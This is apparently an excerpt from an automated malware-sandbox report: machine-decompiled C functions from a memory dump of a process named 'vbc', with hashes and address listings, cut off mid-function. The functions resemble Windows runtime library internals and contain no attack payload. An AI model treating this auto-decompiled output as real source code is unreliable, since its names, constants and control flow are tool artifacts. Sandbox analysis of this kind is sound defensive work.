                                                  0x01636a9f
                                                  0x01636aa2
                                                  0x01636aa5
                                                  0x01636aaf
                                                  0x01636ab1
                                                  0x01636ab8
                                                  0x01636ab9
                                                  0x01636abb
                                                  0x01636abe
                                                  0x01636ac5
                                                  0x01636ac5
                                                  0x01636aaf
                                                  0x01636a40
                                                  0x01636a26
                                                  0x016369fe
                                                  0x01636ace
                                                  0x01636ad0
                                                  0x01636ad3
                                                  0x01636ad8
                                                  0x01636adf
                                                  0x01636adf
                                                  0x01636ae8
                                                  0x01636aef
                                                  0x01636aef
                                                  0x01636af9
                                                  0x01636b06

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf8c0d3cb4a8610ec3058a5388c695c958e486a76bc9153abacc07aad0fee893
                                                  • Instruction ID: 8f61b41d3f2f8761a69ac676444d8ea18eb5b033f06c3dc88657dc06101f9f66
                                                  • Opcode Fuzzy Hash: bf8c0d3cb4a8610ec3058a5388c695c958e486a76bc9153abacc07aad0fee893
                                                  • Instruction Fuzzy Hash: 36415CB1D00209AFDB24DFA9D940BFEBBF8FF88714F14812AE915A7240DB709906CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B5210 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E015B5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E015B52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E015F95D0();
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E015CEB70(_t54, 0x16a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E015F95D0();
								L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E015CEB70(_t54, 0x16a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E015FF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E015CEB70(_t54, 0x16a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E015F95D0();
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                  0x015b5220
                                                  0x015b5224
                                                  0x01610d13
                                                  0x01610d16
                                                  0x01610d19
                                                  0x015b522a
                                                  0x015b522a
                                                  0x015b522d
                                                  0x015b522d
                                                  0x015b5231
                                                  0x015b5235
                                                  0x015b5239
                                                  0x01610d5c
                                                  0x01610d62
                                                  0x00000000
                                                  0x00000000
                                                  0x01610d6a
                                                  0x01610d7b
                                                  0x01610d7f
                                                  0x01610d81
                                                  0x01610d84
                                                  0x01610d95
                                                  0x01610d95
                                                  0x01610d6c
                                                  0x01610d71
                                                  0x01610d71
                                                  0x01610d9a
                                                  0x00000000
                                                  0x015b524a
                                                  0x015b524a
                                                  0x015b5250
                                                  0x01610d24
                                                  0x01610d35
                                                  0x01610d39
                                                  0x01610d3b
                                                  0x01610d3e
                                                  0x01610d50
                                                  0x01610d50
                                                  0x01610d26
                                                  0x01610d2b
                                                  0x01610d2b
                                                  0x00000000
                                                  0x01610d55
                                                  0x015b5256
                                                  0x015b525b
                                                  0x015b5265
                                                  0x01610da7
                                                  0x015b526b
                                                  0x015b526e
                                                  0x015b5272
                                                  0x01610db1
                                                  0x01610db4
                                                  0x01610dc5
                                                  0x01610dc5
                                                  0x015b5272
                                                  0x015b5278
                                                  0x015b527e
                                                  0x015b528a
                                                  0x015b528c
                                                  0x015b528d
                                                  0x00000000
                                                  0x015b5280
                                                  0x015b5282
                                                  0x015b5288
                                                  0x015b529f
                                                  0x015b5292
                                                  0x00000000
                                                  0x015b5292
                                                  0x00000000
                                                  0x015b5288
                                                  0x015b527e

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d11041f728f9bf676c564b2e78514691960f734a48b46f9393786c56417d7d78
                                                  • Instruction ID: 06865aadac938b9201a7d65a577e9378e17e5a3f6b2c0a97c1fe6fef3f53ed05
                                                  • Opcode Fuzzy Hash: d11041f728f9bf676c564b2e78514691960f734a48b46f9393786c56417d7d78
                                                  • Instruction Fuzzy Hash: 0A311832A51602DFCB269F28CC81B6AB7B5FF50720F954A2AF5154F294E720EC41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F3D43 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E015C7B60(0, _t61, 0x15911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E015C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L015D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                  0x015f3d4c
                                                  0x015f3d50
                                                  0x015f3d55
                                                  0x015f3d5e
                                                  0x0162e79a
                                                  0x00000000
                                                  0x0162e79a
                                                  0x015f3d68
                                                  0x0162e789
                                                  0x015f3d9d
                                                  0x015f3da3
                                                  0x015f3daf
                                                  0x015f3db5
                                                  0x015f3dbc
                                                  0x015f3dc4
                                                  0x015f3dc9
                                                  0x015f3dce
                                                  0x0162e7ae
                                                  0x0162e7ae
                                                  0x015f3dde
                                                  0x015f3de2
                                                  0x015f3de7
                                                  0x015f3e0d
                                                  0x015f3e13
                                                  0x015f3e16
                                                  0x015f3e1e
                                                  0x015f3e25
                                                  0x015f3e28
                                                  0x00000000
                                                  0x00000000
                                                  0x015f3e2a
                                                  0x015f3e2f
                                                  0x015f3e37
                                                  0x015f3e37
                                                  0x00000000
                                                  0x015f3e37
                                                  0x015f3e31
                                                  0x00000000
                                                  0x015f3e31
                                                  0x015f3e20
                                                  0x015f3e20
                                                  0x015f3e35
                                                  0x00000000
                                                  0x015f3de9
                                                  0x015f3de9
                                                  0x015f3de9
                                                  0x015f3dee
                                                  0x015f3dfd
                                                  0x015f3dff
                                                  0x015f3e02
                                                  0x015f3e05
                                                  0x015f3e05
                                                  0x00000000
                                                  0x015f3df0
                                                  0x015f3de7
                                                  0x0162e78f
                                                  0x0162e794
                                                  0x015f3d79
                                                  0x015f3d84
                                                  0x015f3d89
                                                  0x015f3d8e
                                                  0x00000000
                                                  0x0162e7a4
                                                  0x015f3d96
                                                  0x015f3d9a
                                                  0x00000000
                                                  0x015f3d9a
                                                  0x00000000
                                                  0x0162e794
                                                  0x015f3d6e
                                                  0x015f3d73
                                                  0x00000000
                                                  0x0162e7b5
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6eecc5f8661695ac59d740f4e6cacc68716141cf26751d26987264883226cb1
                                                  • Instruction ID: 7a2db92701d255a74741e542ce29a8316183a984afd7af9255ca266129494aec
                                                  • Opcode Fuzzy Hash: c6eecc5f8661695ac59d740f4e6cacc68716141cf26751d26987264883226cb1
                                                  • Instruction Fuzzy Hash: BF31AD71A01625DFE7698F2DC841A7ABBE5FF85750B05846EEA45CF390E730D840CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EA61C Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E015EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1690220);
				E0160D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x16a7b9c; // 0x0
				_t55 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0160D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x16a7b10 =  *0x16a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x16a536c; // 0x773a5368
					if( *_t51 != 0x16a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x16a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x16a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E015EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                  0x015ea61c
                                                  0x015ea61e
                                                  0x015ea623
                                                  0x015ea628
                                                  0x015ea62b
                                                  0x015ea62d
                                                  0x015ea648
                                                  0x015ea64a
                                                  0x015ea64f
                                                  0x01629b44
                                                  0x015ea6ec
                                                  0x015ea6f1
                                                  0x015ea6f1
                                                  0x015ea655
                                                  0x015ea657
                                                  0x015ea65a
                                                  0x015ea65d
                                                  0x015ea662
                                                  0x015ea663
                                                  0x015ea667
                                                  0x015ea668
                                                  0x015ea66d
                                                  0x015ea706
                                                  0x015ea706
                                                  0x01629bda
                                                  0x01629be6
                                                  0x01629beb
                                                  0x00000000
                                                  0x01629beb
                                                  0x015ea679
                                                  0x01629b7a
                                                  0x00000000
                                                  0x01629b7a
                                                  0x015ea683
                                                  0x015ea6f4
                                                  0x015ea6f7
                                                  0x015ea6f9
                                                  0x015ea6fd
                                                  0x015ea6a0
                                                  0x015ea6a0
                                                  0x015ea6ad
                                                  0x015ea6af
                                                  0x015ea6b4
                                                  0x01629ba7
                                                  0x01629bac
                                                  0x00000000
                                                  0x00000000
                                                  0x01629bc6
                                                  0x01629bce
                                                  0x01629bd1
                                                  0x01629bd3
                                                  0x01629bd3
                                                  0x00000000
                                                  0x01629bd1
                                                  0x015ea6bd
                                                  0x015ea6c3
                                                  0x015ea6c6
                                                  0x015ea6d2
                                                  0x015ea701
                                                  0x015ea704
                                                  0x00000000
                                                  0x015ea704
                                                  0x015ea6d4
                                                  0x015ea6d6
                                                  0x015ea6d9
                                                  0x015ea6db
                                                  0x015ea6e1
                                                  0x015ea6e6
                                                  0x015ea6e8
                                                  0x015ea6e8
                                                  0x015ea6ea
                                                  0x00000000
                                                  0x015ea6ea
                                                  0x015ea688
                                                  0x015ea692
                                                  0x015ea694
                                                  0x015ea699
                                                  0x00000000
                                                  0x00000000
                                                  0x015ea69d
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1140d9dfdeb88a06a584370c5e3e8a6bc7c49ec6e50be6ffcc546fbb2f758ff1
                                                  • Instruction ID: 4617ed3f84ea9386a738637fef01f012c5c2a3cfe270ddf5393ff93e5c1df82d
                                                  • Opcode Fuzzy Hash: 1140d9dfdeb88a06a584370c5e3e8a6bc7c49ec6e50be6ffcc546fbb2f758ff1
                                                  • Instruction Fuzzy Hash: A1416AB5E40215DFDB19CFA8C890B9EBBF1BB89304F1581A9E905AF345D774A901CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DC182 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E015DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E015D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01688D34(_v8, _t80);
					}
					E015D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E015CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01688833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E015CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E015FB180();
						if(_a4 != 0) {
							E015D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E015DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E015DBB2D(_t16, _t15);
						E015DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E015CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E015CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E015CFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                  0x015dc18d
                                                  0x015dc18f
                                                  0x015dc191
                                                  0x015dc19b
                                                  0x015dc1a0
                                                  0x015dc1d4
                                                  0x015dc1de
                                                  0x01622d6e
                                                  0x015dc1e4
                                                  0x015dc1e4
                                                  0x015dc1e4
                                                  0x015dc1ec
                                                  0x01622d7d
                                                  0x01622d7d
                                                  0x015dc1f3
                                                  0x015dc1ff
                                                  0x01622d88
                                                  0x01622d8d
                                                  0x01622d94
                                                  0x01622d94
                                                  0x01622d9f
                                                  0x01622da4
                                                  0x01622dab
                                                  0x01622db0
                                                  0x01622db2
                                                  0x01622db3
                                                  0x01622db4
                                                  0x01622dbc
                                                  0x01622dc3
                                                  0x01622dc3
                                                  0x015dc205
                                                  0x015dc205
                                                  0x015dc208
                                                  0x015dc20e
                                                  0x015dc211
                                                  0x015dc216
                                                  0x015dc219
                                                  0x015dc21f
                                                  0x015dc222
                                                  0x015dc22c
                                                  0x015dc234
                                                  0x015dc23a
                                                  0x015dc23f
                                                  0x015dc245
                                                  0x015dc24b
                                                  0x015dc251
                                                  0x015dc25a
                                                  0x015dc276
                                                  0x015dc27d
                                                  0x015dc27d
                                                  0x015dc25c
                                                  0x015dc25c
                                                  0x00000000
                                                  0x015dc25e
                                                  0x015dc1a4
                                                  0x015dc1aa
                                                  0x015dc1b3
                                                  0x015dc265
                                                  0x015dc26c
                                                  0x015dc26c
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction ID: 857ae9c1b333dbf6032119a647b5ccd63d9a159ef5c099d682780514f7a35567
                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction Fuzzy Hash: 82310672A01557AED715EBF8C890BE9FB95BF92204F04415ED51C4F201DB346A46CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01637016 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E01637016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x16ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01636B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01636B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E015D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E015F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E015FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L015D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                  0x01637016
                                                  0x0163701e
                                                  0x0163702b
                                                  0x01637033
                                                  0x01637037
                                                  0x0163703c
                                                  0x0163703e
                                                  0x01637041
                                                  0x01637045
                                                  0x0163704a
                                                  0x01637050
                                                  0x01637055
                                                  0x0163705a
                                                  0x01637062
                                                  0x01637062
                                                  0x0163705a
                                                  0x01637064
                                                  0x01637064
                                                  0x01637067
                                                  0x01637071
                                                  0x01637096
                                                  0x0163709b
                                                  0x016370a2
                                                  0x016370a6
                                                  0x016370a7
                                                  0x016370ad
                                                  0x016370b3
                                                  0x016370b6
                                                  0x016370bb
                                                  0x016370c3
                                                  0x016370c3
                                                  0x016370c6
                                                  0x016370cd
                                                  0x016370dd
                                                  0x016370e0
                                                  0x016370e2
                                                  0x016370e2
                                                  0x016370ee
                                                  0x01637101
                                                  0x016370f0
                                                  0x016370f9
                                                  0x016370f9
                                                  0x0163710a
                                                  0x0163710e
                                                  0x01637112
                                                  0x01637117
                                                  0x01637118
                                                  0x01637118
                                                  0x016370bb
                                                  0x0163711d
                                                  0x01637123
                                                  0x01637131
                                                  0x01637131
                                                  0x01637136
                                                  0x0163713d
                                                  0x0163713e
                                                  0x0163713f
                                                  0x0163714a
                                                  0x0163714a
                                                  0x01637084
                                                  0x01637088
                                                  0x00000000
                                                  0x0163708e
                                                  0x0163708e
                                                  0x01637092
                                                  0x00000000
                                                  0x01637092

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93d50eb6d46c625738c58e742bd7efc86e77d443e2ef1215c7af8b2a33a79208
                                                  • Instruction ID: 52749b45717ebb2cd7e0a3856c2d86892683dd7a8ca27d3551e8e07c3311e84a
                                                  • Opcode Fuzzy Hash: 93d50eb6d46c625738c58e742bd7efc86e77d443e2ef1215c7af8b2a33a79208
                                                  • Instruction Fuzzy Hash: C031B3B26047529BD321DF2CCC40A6AB7E5FFD8600F044A2DF9959B790E730E914CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01663D40 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E01663D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x16ad360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E015D2280(_t34, 0x16a8a6c);
				_t64 =  *0x16a5768; // 0x773a5768
				if(_t64 != 0x16a5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x773a5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E015CFFB0(_t53, _t64, 0x16a8a6c);
						 *0x16ab1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E015D2280(_t45, 0x16a8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
